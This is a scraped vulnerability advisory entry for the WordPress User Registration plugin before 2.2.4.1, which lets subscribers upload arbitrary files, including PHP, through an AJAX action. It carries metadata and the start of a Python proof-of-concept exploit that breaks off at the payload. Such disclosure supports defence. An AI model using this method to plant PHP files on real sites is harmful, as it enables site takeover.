Lucene search

K
wpvulndbCydaveWPVDB-ID:968C677C-1BEB-459B-8FD1-7F70BCAA4F74
HistoryNov 21, 2022 - 12:00 a.m.

User Registration < 2.2.4.1 - Subscriber+ Arbitrary File Upload

2022-11-2100:00:00
cydave
wpscan.com
10
user registration
arbitrary file upload
wordpress security

0.002 Low

EPSS

Percentile

53.0%

The plugin does not properly restrict the files to be uploaded via an AJAX action available to both unauthenticated and authenticated users, which could allow unauthenticated users to upload PHP files for example.

PoC

The following Python script automates the exploitation of this plugin by uploading a malicious PHP file (tested on a default installation of WordPress 6.1) -– import io import random import re import string import requests BASE_URL = input("Enter the target URL: ") USERNAME = input("Enter the subscriber user: “) PASSWORD = input(“Enter the user password: “) PAYLOAD = io.StringIO(”””\

CPENameOperatorVersion
user-registrationlt2.2.4.1

0.002 Low

EPSS

Percentile

53.0%

Related for WPVDB-ID:968C677C-1BEB-459B-8FD1-7F70BCAA4F74